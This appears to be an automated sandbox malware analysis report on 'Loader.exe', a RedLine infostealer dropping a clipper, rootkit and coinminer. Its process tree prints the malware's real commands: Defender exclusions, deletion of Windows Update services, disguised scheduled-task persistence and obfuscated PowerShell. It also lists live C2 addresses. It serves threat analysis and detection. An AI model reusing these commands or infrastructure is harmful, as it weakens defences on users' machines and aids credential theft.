Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample Name:	Loader.exe
Analysis ID:	740449
MD5:	4e0323edbafa68173ea06b1ec8b95195
SHA1:	43e54fe6123884142cced786a64c5f26a5899593
SHA256:	0fddeb14acea742a808d10f5c6da7f411ea92e44f5e85b39cb8e9cf5e104a0ae
Tags:	exeRedLineStealer
Infos:

Detection

Laplas Clipper, MicroClip, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Sigma detected: Stop multiple services

Yara detected Laplas Clipper

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Yara detected MicroClip

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Uses cmd line tools excessively to alter registry or file data

Encrypted powershell cmdline option found

Machine Learning detection for sample

Allocates memory in foreign processes

Creates files in the system32 config directory

Hooks processes query functions (used to hide processes)

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality to inject code into remote processes

Adds a directory exclusion to Windows Defender

Found many strings related to Crypto-Wallets (likely being stolen)

Hooks files or directories query functions (used to hide files and directories)

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses powercfg.exe to modify the power settings

Modifies power options to not sleep / hibernate

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Modifies the prolog of user mode functions (user mode inline hooks)

Found hidden mapped module (file has been removed from disk)

Obfuscated command line found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Potential dropper URLs found in powershell memory

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Uses reg.exe to modify the Windows registry

PE file contains more sections than normal

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Creates files inside the system directory

PE file contains sections with non-standard names

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Creates job files (autostart)

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Is looking for software installed on the system

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

Loader.exe (PID: 5244 cmdline: C:\Users\user\Desktop\Loader.exe MD5: 4E0323EDBAFA68173EA06B1EC8B95195)

conhost.exe (PID: 5124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

AppLaunch.exe (PID: 100012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)

ofg.exe (PID: 3628 cmdline: "C:\Users\user\AppData\Local\Microsoft\ofg.exe" MD5: CD4AC234EE1C9FCA552D11FF31B9C5CC)

cmd.exe (PID: 4584 cmdline: cmd.exe "/C schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5208 cmdline: schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

brave.exe (PID: 2804 cmdline: "C:\Users\user\AppData\Local\Microsoft\brave.exe" MD5: 9253ED091D81E076A3037E12AF3DC871)

powershell.exe (PID: 6140 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6504 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6604 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 6696 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 6764 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 6796 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 6820 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)

reg.exe (PID: 6876 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6896 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6916 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6960 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 7024 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 6512 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powercfg.exe (PID: 6612 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 6656 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 6748 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 6788 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powershell.exe (PID: 6528 cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dialer.exe (PID: 7188 cmdline: C:\Windows\system32\dialer.exe MD5: 0EC74656A7F7667DD94C76081B111827)

powershell.exe (PID: 7196 cmdline: powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 7616 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

setup.exe (PID: 6232 cmdline: "C:\Users\user\AppData\Local\Microsoft\setup.exe" MD5: 96CBBD2930425374E0D2D6E251BE9834)

powershell.exe (PID: 6264 cmdline: powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svcupdater.exe (PID: 1048 cmdline: C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe MD5: CD4AC234EE1C9FCA552D11FF31B9C5CC)

powershell.exe (PID: 7384 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})" MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 7392 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})" MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["79.137.204.112:80"], "Bot Id": "@akkkerman", "Message": "Click Close to exit the program. Error code: 1142", "Authorization Header": "0ba115baec822e8fab2188d69bd8b714"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.551221495.0000019C33010000.00000040.00001000.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000000.00000003.256139180.0000000000A92000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.551047553.0000019C32FE0000.00000040.00000400.00020000.00000000.sdmp	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
00000002.00000002.423897208.00000000074F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loader.exe PID: 5244	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 100012	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 100012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ofg.exe PID: 3628	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Process Memory Space: svcupdater.exe PID: 1048	JoeSecurity_LaplasClipper	Yara detected Laplas Clipper	Joe Security
Process Memory Space: svcupdater.exe PID: 1048	JoeSecurity_MicroClip	Yara detected MicroClip	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.2.svcupdater.exe.19c33010000.2.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
0.2.Loader.exe.ae0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.Loader.exe.ae0000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x260ec:$s5: delete[] 0x53a18:$pat14: , CommandLine: 0x4b68a:$v2_1: ListOfProcesses 0x4b41e:$v4_3: base64str 0x4c4a9:$v4_4: stringKey 0x4902c:$v4_5: BytesToStringConverted 0x48094:$v4_6: FromBase64 0x49800:$v4_8: procName 0x49b83:$v5_1: DownloadAndExecuteUpdate 0x4b32e:$v5_2: ITaskProcessor 0x49b71:$v5_3: CommandLineUpdate 0x49b62:$v5_4: DownloadUpdate 0x4a222:$v5_5: FileScanning 0x4939b:$v5_7: RecordHeaderField 0x48dba:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
17.2.svcupdater.exe.19c32fe0000.1.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
0.3.Loader.exe.a90000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.Loader.exe.a90000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x21098:$pat14: , CommandLine: 0x18d0a:$v2_1: ListOfProcesses 0x18a9e:$v4_3: base64str 0x19b29:$v4_4: stringKey 0x166ac:$v4_5: BytesToStringConverted 0x15714:$v4_6: FromBase64 0x16e80:$v4_8: procName 0x17203:$v5_1: DownloadAndExecuteUpdate 0x189ae:$v5_2: ITaskProcessor 0x171f1:$v5_3: CommandLineUpdate 0x171e2:$v5_4: DownloadUpdate 0x178a2:$v5_5: FileScanning 0x16a1b:$v5_7: RecordHeaderField 0x1643a:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
17.2.svcupdater.exe.19c32fe0000.1.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
0.2.Loader.exe.b14780.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.Loader.exe.b14780.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1f498:$pat14: , CommandLine: 0x1710a:$v2_1: ListOfProcesses 0x16e9e:$v4_3: base64str 0x17f29:$v4_4: stringKey 0x14aac:$v4_5: BytesToStringConverted 0x13b14:$v4_6: FromBase64 0x15280:$v4_8: procName 0x15603:$v5_1: DownloadAndExecuteUpdate 0x16dae:$v5_2: ITaskProcessor 0x155f1:$v5_3: CommandLineUpdate 0x155e2:$v5_4: DownloadUpdate 0x15ca2:$v5_5: FileScanning 0x14e1b:$v5_7: RecordHeaderField 0x1483a:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
17.2.svcupdater.exe.19c33010000.2.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x44d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
Click to see the 5 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Microsoft\brave.exe" , ParentImage: C:\Users\user\AppData\Local\Microsoft\brave.exe, ParentProcessId: 2804, ParentProcessName: brave.exe, ProcessCommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 6504, ProcessName: cmd.exe

Snort Signatures

ETPRO MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 79.137.204.112 - Destination IP: 192.168.2.7

Timestamp:	79.137.204.112192.168.2.780497112850353 11/07/22-23:48:32.369814
SID:	2850353
Source Port:	80
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 79.137.204.112

Timestamp:	192.168.2.779.137.204.11249711802850286 11/07/22-23:49:11.408992
SID:	2850286
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init - Source IP: 192.168.2.7 - Destination IP: 79.137.204.112

Timestamp:	192.168.2.779.137.204.11249711802850027 11/07/22-23:48:30.299208
SID:	2850027
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.857970532036289 11/07/22-23:50:41.139323
SID:	2036289
Source Port:	57970
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://clipper.guru/bot/online?guid=computer\user&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46

Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\3A08.tmp

Avira: detection malicious, Label: TR/Dropper.MSIL.Gen

Multi AV Scanner detection for submitted file

Source: Loader.exe	ReversingLabs: Detection: 65%
Source: Loader.exe	Virustotal: Detection: 60%			Perma Link

Multi AV Scanner detection for domain / URL

Source: clipper.guru

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Microsoft\ofg.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\3A08.tmp	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\3A08.tmp	Metadefender: Detection: 32%	Perma Link
Source: C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe	ReversingLabs: Detection: 65%

Machine Learning detection for sample

Source: Loader.exe

Joe Sandbox ML: detected

Source: 47.0.dialer.exe.7ff7fdb70000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 47.2.dialer.exe.7ff7fdb70000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 47.0.dialer.exe.7ff7fdb70000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen

Source: 0.3.Loader.exe.a90000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["79.137.204.112:80"], "Bot Id": "@akkkerman", "Message": "Click Close to exit the program. Error code: 1142", "Authorization Header": "0ba115baec822e8fab2188d69bd8b714"}

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 35.213.155.151:443 -> 192.168.2.7:49713 version: TLS 1.2

Source: Loader.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: setup.exe, 00000015.00000002.535791052.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.532114626.0000000000D80000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.532807947.0000000000DA0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: brave.exe, 00000012.00000002.491582259.00000211F8572000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: brave.exe, 00000012.00000002.491582259.00000211F8572000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svcupdater.exe, 00000011.00000002.551221495.0000019C33010000.00000040.00001000.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.551047553.0000019C32FE0000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: brave.exe, 00000012.00000002.491582259.00000211F8572000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.500875315.00007FF7FDB7D000.00000002.00000001.01000000.00000000.sdmp, dialer.exe, 0000002F.00000000.477979440.00007FF7FDB7D000.00000002.00000001.01000000.00000000.sdmp

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00AFBE04 FindFirstFileExW,

0_2_00AFBE04

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_0AC21CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0AC2160Ah	2_2_0AC211E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0AC21A8Ah	2_2_0AC211E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0AC2F76Bh	2_2_0AC2F490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0AC20940h	2_2_0AC20928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0AC2E255h	2_2_0AC2E234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0AC2C8F8h	2_2_0AC2C750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0AC2C8F8h	2_2_0AC2C760

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.7:49711 -> 79.137.204.112:80
Source: Traffic	Snort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.7:49711 -> 79.137.204.112:80
Source: Traffic	Snort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 79.137.204.112:80 -> 192.168.2.7:49711
Source: Traffic	Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.7:57970 -> 8.8.8.8:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 79.137.204.112:80

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000016.00000002.545531135.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
